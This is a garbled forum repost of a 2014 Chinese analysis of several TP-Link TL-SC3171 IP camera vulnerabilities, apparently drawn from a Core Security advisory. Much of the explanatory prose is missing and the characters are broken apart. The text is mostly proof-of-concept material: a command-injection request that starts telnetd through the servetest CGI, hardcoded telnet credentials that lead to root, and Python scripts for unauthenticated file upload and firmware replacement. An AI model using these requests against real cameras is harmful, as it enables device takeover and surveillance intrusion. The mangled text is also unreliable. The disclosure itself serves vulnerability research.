[8219] 2014-08-25_TP-Link网络摄像机的多个漏洞详细分析

文档创建者:s7ckTeam
浏览次数:39
最后更新:2025-01-17
2014-08-25_TP-Link网络摄像机的多个漏洞详细分析 T P - L i n k   F r e e B u f   2 0 1 4 - 0 8 - 2 5 T P - L i n k T L - S C 3 1 7 1   I P   C a m e r a s L M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 1 [ C V E - 2 0 1 3 - 2 5 7 8 ]   / c g i - b i n / a d m i n / s e r v e t e s t 2 [ C V E - 2 0 1 3 - 2 5 7 9 ] s h e l l 3 [ C V E - 2 0 1 3 - 2 5 8 0 ] 4 [ C V E - 2 0 1 3 - 2 5 8 1 ] 1 1 [ C V E - 2 0 1 3 - 2 5 8 1 ] r o o t 2 h t t p : / / < i p - c a m > / c g i - b i n / r e b o o t   2 1 h t t p : / / < i p - c a m > / c g i - b i n / h a r d f a c t o r y d e f a u l t 使 a d m i n : a d m i n 2 h t t p : / / < i p - c a m > / c g i - b i n / r e b o o t 3 [ C V E - 2 0 1 3 - 2 5 7 8 ] T e l n e t 4 使 q m i k T e l n e t 使 T P - L i n k   T L - S C 3 1 3 0   ( L M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 ) T P - L i n k   T L - S C 3 1 3 0 G   ( L M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 ) T P - L i n k   T L - S C 3 1 7 1   ( M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 ) T P - L i n k   T L - S C 3 1 7 1 G   ( L M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 ) T P - L i n k [ 3 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 3 0 . z i p [ 4 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 3 0 G . z i p [ 5 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 7 1 . z i p
[ 6 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 7 1 G . z i p T P - L I N K P o C 1 s e r v e t e s t [ C V E - 2 0 1 3 - 2 5 7 8 ] / c g i - b i n / a d m i n / s e r v e t e s t P o C t e l n e t G E T / c g i - b i n / a d m i n / s e r v e t e s t ? c m d = s m t p & S e r v e r N a m e = 1 . 1 . 1 . 1 ; / u s r / s b i n / t e l n e t d ; & S e r v e r P o r t = 2 5 & S e r v e r S S L = o f f & R c p t T o A d d r 1 = q @ q & A d m i n A d d r = q @ q H T T P / 1 . 1 A c c e p t :   * / * A c c e p t - L a n g u a g e :   e n - u s R e f e r e r :   < a   h r e f = " h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / p r o g r e s s . h t m " > h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / p r o g r e s s . h t m < / a > I f - M o d i f i e d - S i n c e :   S a t ,   1   J a n   2 0 0 0   0 0 : 0 0 : 0 0   G M T A c c e p t - E n c o d i n g :   g z i p ,   d e f l a t e U s e r - A g e n t :   M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   9 . 0 ;   W i n d o w s   N T   6 . 1 ;   W O W 6 4 ; T r i d e n t / 5 . 0 ) H o s t :   1 9 2 . 1 6 8 . 1 . 1 0 0 P r o x y - C o n n e c t i o n :   K e e p - A l i v e C o o k i e :   V i d e o F m t = 1 A u t h o r i z a t i o n :   B a s i c   Y W R t a W 4 6 Y W R t a W 4 = C o n t e n t - L e n g t h :   2 2 t e l n e t [ C V E - 2 0 1 3 - 2 5 7 9 ] 使 t e l n e t u s e r n a m e :   q m i k p a s s w o r d :   ( n o n e ) q m i k s u r o o t t e l n e t [ C V E - 2 0 1 3 - 2 5 7 8 ] 3 [ C V E - 2 0 1 3 - 2 5 8 0 ] / c g i - b i n / u p l o a d f i l e P y t h o n   P o C i m p o r t   r e q u e s t s   f i l e N a m e   =   " l a l a . t m p " f   =   o p e n ( f i l e N a m e ,   " w " ) f . w r i t e ( " l a l a " ) f . c l o s e ( ) r e q u e s t s . p o s t ( " < a   h r e f = " h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / u p l o a d f i l e " > h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / u p l o a d f i l e < / a > " ,   f i l e s = { f i l e N a m e :   o p e n ( f i l e N a m e ,   " r b " ) } )
l a l a . t m p / m n t / m t d 4 [ C V E - 2 0 1 3 - 2 5 8 1 ] / c g i - b i n / f i r m w a r e u p g r a d e P y t h o n P o C i m p o r t   r e q u e s t s   r e q u e s t s . g e t ( " < a   h r e f = " h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / f i r m w a r e u p g r a d e ? a c t i o n = p r e s e t " > h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / f i r m w a r e u p g r a d e ? a c t i o n = p r e s e t < / a > " ) f i l e N a m e   =   " C O M _ T 0 1 F 0 0 1 _ L M . 1 . 6 . 1 8 P 1 2 _ s i g n 5 _ T P L . T L - S C 3 1 7 1 . b i n " c o o k i e s = { " V i d e o F m t " : " 1 " } r e q u e s t s . p o s t ( " < a   h r e f = " h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / f i r m w a r e u p g r a d e ? a c t i o n = p r e s e t " > h t t p : / / 1 9 2 . 1 6 8 . 1 . 1 0 0 / c g i - b i n / f i r m w a r e u p g r a d e ? a c t i o n = p r e s e t < / a > " ,   f i l e s = { " S e t F W F i l e N a m e "   :   ( f i l e N a m e ,   o p e n ( f i l e N a m e ,   " r b " ) ) } , c o o k i e s = c o o k i e s ) [ 1 ]   T P - L i n k   T L - S C 3 1 7 1 ,   h t t p : / / w w w . t p - l i n k . c o m / e n / p r o d u c t s / d e t a i l s / ? c a t e g o r y i d = 2 3 0 & m o d e l = T L - S C 3 1 7 1 .   [ 2 ]   S e c u r i t y   A n a l y s i s   o f   I P   v i d e o   s u r v e i l l a n c e   c a m e r a s ,   h t t p : / / s e c l i s t s . o r g / f u l l d i s c l o s u r e / 2 0 1 3 / J u n / 8 4 .   [ 3 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 3 0 . z i p .   [ 4 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 3 0 G . z i p .   [ 5 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 7 1 . z i p .   [ 6 ]   h t t p : / / w w w . t p - l i n k . c o m / r e s o u r c e s / s o f t w a r e / 1 . 6 . 1 8 P 1 2 _ s i g n 6 _ T L - S C 3 1 7 1 G . z i p . h t t p : / / w w w . c o r e s e c u r i t y . c o m / a d v i s o r i e s / m u l t i p l e - v u l n e r a b i l i t i e s - t p - l i n k - t l - s c 3 1 7 1 - i p - c a m e r a s # o t h e r
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则